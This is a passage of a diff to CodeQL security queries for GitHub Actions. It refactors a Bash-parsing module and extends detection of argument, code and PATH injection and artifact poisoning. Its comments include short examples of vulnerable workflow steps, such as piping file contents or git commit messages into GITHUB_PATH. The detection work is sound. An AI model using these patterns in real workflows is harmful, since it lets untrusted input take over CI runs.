+1,364 @@ +private import codeql.actions.Ast +private import codeql.Locations +import codeql.actions.config.Config +private import codeql.actions.security.ControlChecks + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string pipeSeparator() { result = "|" } + + string splitSeparators() { + result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate isCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = "\\$\\(([^)]+)\\)" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = "`([^`]+)`" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate containsCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = ".*\\$\\(([^)]+)\\).*" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = ".*`([^`]+)`.*" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[expr] + predicate containsParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = ".*\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = ".*\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) + } + + bindingset[script] + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string var_name | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + var_name = trimQuotes(script.regexpCapture(regexp, 3)).regexpReplaceAll("<<\\s*(\\S+)", "") and + content = + var_name + "=$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + .regexpReplaceAll(">>.*GITHUB_(ENV|OUTPUT)(})?", "") + .trim() + ")" and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string first_line, string var_name | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + first_line = script.regexpCapture(regexp, 1).splitAt("\n", 0).trim() and + var_name = first_line.regexpCapture("echo\\s+('|\\\")?(.*)<<.*", 2) and + content = var_name + "=$(" + script.regexpCapture(regexp, 1).splitAt("\n").trim() + ")" and + not content.indexOf("EOF") > 0 and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + + bindingset[script] + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[script, file_var] + predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) + ) + } + + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + predicate fileToFileWrite(Run run, string file_var, string path) { + exists(string regexp, string stmt, string file_expr | + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + stmt = run.getAStmt() and + file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and + path = stmt.regexpCapture(regexp, 2) and + containsParameterExpansion(file_expr, file_var, _, _) + ) + } + + predicate fileToGitHubEnv(Run run, string path) { fileToFileWrite(run, "GITHUB_ENV", path) } + + predicate fileToGitHubOutput(Run run, string path) { fileToFileWrite(run, "GITHUB_OUTPUT", path) } + + predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run, "GITHUB_PATH", path) } + + bindingset[snippet] + predicate outputsPartialFileContent(Run run, string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + exists(int i, string line, string cmd | + run.getStmt(i) = line and + line.indexOf(snippet.regexpReplaceAll("^\\$\\(", "").regexpReplaceAll("\\)$", "")) > -1 and + run.getCommand(i) = cmd and + cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 + ) + } + + /** + * Holds if the Run scripts contains an access to an environment variable called `var` + * which value may get appended to the GITHUB_XXX special file + */ + predicate envReachingGitHubFileWrite(Run run, string var, string file_var, string field) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + run.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + run.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + run.getAWriteToGitHubPath(file_write_value) + ) and + envReachingRunExpr(run, var, file_write_value) + ) + } + + /** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ + bindingset[expr] + predicate envReachingRunExpr(Run run, string var, string expr) { + exists(string var2, string value2 | + // VAR2=${VAR:-default} (var2=value2) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + run.getAnAssignment(var2, value2) and + containsParameterExpansion(value2, var, _, _) and + containsParameterExpansion(expr, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=${VAR:-default}" >> $GITHUB_ENV (field, file_write_value) + containsParameterExpansion(expr, var, _, _) + } + + /** + * Holds if the Run scripts contains a command substitution (`cmd`) + * which output may get appended to the GITHUB_XXX special file + */ + predicate cmdReachingGitHubFileWrite(Run run, string cmd, string file_var, string field) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + run.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + run.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + run.getAWriteToGitHubPath(file_write_value) + ) and + ( + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + run.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(file_write_value, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(file_write_value, cmd) + ) + ) + } +} diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 688d62acbe1..ae4405a185b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,7 +1,8 @@ private import codeql.actions.Ast private import codeql.Locations -import codeql.actions.config.Config private import codeql.actions.security.ControlChecks +import codeql.actions.config.Config +import codeql.actions.Bash bindingset[expr] string normalizeExpr(string expr) { @@ -82,239 +83,3 @@ string normalizePath(string path) { */ bindingset[subpath, path] predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } - -module Bash { - string stmtSeparator() { result = ";" } - - string commandSeparator() { result = ["&&", "||"] } - - string pipeSeparator() { result = "|" } - - string splitSeparators() { - result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() - } - - string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } - - string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } - - /** Checks if expr is a bash parameter expansion */ - bindingset[expr] - predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { - exists(string regexp | - // $VAR - regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${VAR} - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${!VAR} - regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 2) and - operator = expr.regexpCapture(regexp, 1) and - params = "" - or - // ${VAR}, ... - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = expr.regexpCapture(regexp, 2) and - params = expr.regexpCapture(regexp, 3) - ) - } - - bindingset[raw_content] - predicate extractVariableAndValue(string raw_content, string key, string value) { - exists(string regexp, string content | content = trimQuotes(raw_content) | - regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and - key = trimQuotes(content.regexpCapture(regexp, 1)) and - value = trimQuotes(content.regexpCapture(regexp, 3)) - or - exists(string line | - line = content.splitAt("\n") and - regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and - key = trimQuotes(line.regexpCapture(regexp, 1)) and - value = trimQuotes(line.regexpCapture(regexp, 2)) - ) - ) - } - - bindingset[script] - predicate singleLineFileWrite( - string script, string cmd, string file, string content, string filters - ) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" and - content = script.regexpCapture(regexp, 2) - ) - } - - bindingset[script] - predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = script.regexpCapture(regexp, 4) and - value = trimQuotes(script.regexpCapture(regexp, 5)) - or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = "" and - value = trimQuotes(script.regexpCapture(regexp, 4)) - ) - } - - bindingset[script] - predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and - content = script.regexpCapture(regexp, 6) and - filters = "" - or - regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 7)) and - filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 8) - ) - } - - bindingset[script] - predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + - "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and - content = - trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + - trimQuotes(script.regexpCapture(regexp, 6)) + "\n" + - trimQuotes(script.regexpCapture(regexp, 4)) and - cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" - ) - } - - bindingset[script] - predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^\\s*\\{\\s*[\r\n]" + - // - "(.*?)" + - // - "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and - content = - script - .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - cmd = "echo" and - filters = "" - ) - } - - bindingset[script] - predicate multiLineFileWrite( - string script, string cmd, string file, string content, string filters - ) { - heredocFileWrite(script, cmd, file, content, filters) - or - linesFileWrite(script, cmd, file, content, filters) - or - blockFileWrite(script, cmd, file, content, filters) - } - - bindingset[script, file_var] - predicate extractFileWrite(string script, string file_var, string content) { - // single line assignment - exists(string file_expr, string raw_content | - isBashParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and - content = trimQuotes(raw_content) - ) - or - // workflow command assignment - exists(string key, string value, string cmd | - ( - file_var = "GITHUB_ENV" and - cmd = "set-env" and - content = key + "=" + value - or - file_var = "GITHUB_OUTPUT" and - cmd = "set-output" and - content = key + "=" + value - or - file_var = "GITHUB_PATH" and - cmd = "add-path" and - content = value - ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) - ) - or - // multiline assignment - exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and - isBashParameterExpansion(file_expr, file_var, _, _) and - content = trimQuotes(raw_content) - ) - } - - /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ - bindingset[script, file_var] - predicate fileToFileWrite(string script, string file_var, string path) { - exists(string regexp, string line, string file_expr | - isBashParameterExpansion(file_expr, file_var, _, _) and - regexp = - "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + - "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - line = script.splitAt("\n") and - path = line.regexpCapture(regexp, 2) and - file_expr = trimQuotes(line.regexpCapture(regexp, 5)) - ) - } - - predicate fileToGitHubEnv(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_ENV", path) - } - - predicate fileToGitHubOutput(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) - } - - predicate fileToGitHubPath(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_PATH", path) - } - - bindingset[snippet] - predicate outputsPartialFileContent(Run run, string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - // Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - exists(int i, string line, string cmd | - run.getStmt(i) = line and - line.matches("%" + snippet + "%") and - run.getCommand(i) = cmd and - cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - ) - } -} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 30b57e361ab..a4b5778246a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1526,6 +1526,22 @@ class RunImpl extends StepImpl { predicate getAWriteToGitHubPath(string value) { Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } } /** diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 6e1a5c0f229..18ff398ebab 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,6 +9,23 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } +/** + * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command + * in a Run step. + * Where the command is a string captured from the Run's script. + */ +bindingset[var] +predicate envToArgInjSink(string var, Run run, string command) { + exists(string argument, string cmd, string regexp, int command_group, int argument_group | + run.getACommand() = cmd and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + command = cmd.regexpCapture(regexp, command_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + Bash::envReachingRunExpr(run, var, argument) and + exists(run.getInScopeEnvVarExpr(var)) + ) +} + /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. @@ -21,10 +38,10 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { string command; ArgumentInjectionFromEnvVarSink() { - exists(Run run, string var_name | - envToArgInjSink(var_name, run, command) and + exists(Run run, string var | + envToArgInjSink(var, run, command) and run.getScriptScalar() = this.asExpr() and - exists(run.getInScopeEnvVarExpr(var_name)) + exists(run.getInScopeEnvVarExpr(var)) ) or exists( @@ -42,6 +59,33 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { override string getCommand() { result = command } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to an unsafe argument + * e.g. + * run: | + * BODY=$(git log --format=%s) + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { + string command; + + ArgumentInjectionFromCommandSink() { + exists( + CommandSource source, Run run, string cmd, string argument, string regexp, int argument_group, + int command_group + | + run = source.getEnclosingRun() and + this.asExpr() = run.getScriptScalar() and + cmd = run.getACommand() and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + command = cmd.regexpCapture(regexp, command_group) + ) + } + + override string getCommand() { result = command } +} + /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. */ @@ -71,6 +115,14 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + envToArgInjSink(var, run, _) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index b7015590614..31a9edd03b3 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -274,6 +274,24 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(PoisonableStep step | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = step and + ( + succ.asExpr() = step.(Run).getScriptScalar() or + succ.asExpr() = step.(UsesStep) + ) + ) + or + exists(Run run | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe artifacts that is used in an insecure way. */ diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index 8cd589fa9f8..ca72fe00d16 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -19,6 +19,22 @@ private module CodeInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "code-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index a80032de320..1f53c938436 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -14,6 +14,9 @@ abstract class EnvPathInjectionSink extends DataFlow::Node { } * e.g. * run: | * cat foo.txt >> $GITHUB_PATH + * echo "$(cat foo.txt)" >> $GITHUB_PATH + * FOO=$(cat foo.txt) + * echo "$FOO" >> $GITHUB_PATH */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { @@ -25,35 +28,34 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and ( - // e.g. - // cat test-results/.env >> $GITHUB_PATH - Bash::fileToGitHubPath(run, _) - or - exists(string value | - run.getAWriteToGitHubPath(value) and - ( - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_PATH", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubPath(run, _) ) ) } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "${COMMIT_MESSAGE}" >> $GITHUB_PATH + */ +class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { + EnvPathInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScriptScalar() and + Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_PATH", + _) + ) + } +} + /** * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. * e.g. @@ -65,7 +67,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToSpecialFile("GITHUB_PATH", var_name, run, _) and + Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_PATH", _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) @@ -84,6 +86,28 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + ) + or + exists(Uses step | + pred instanceof FileSource and + 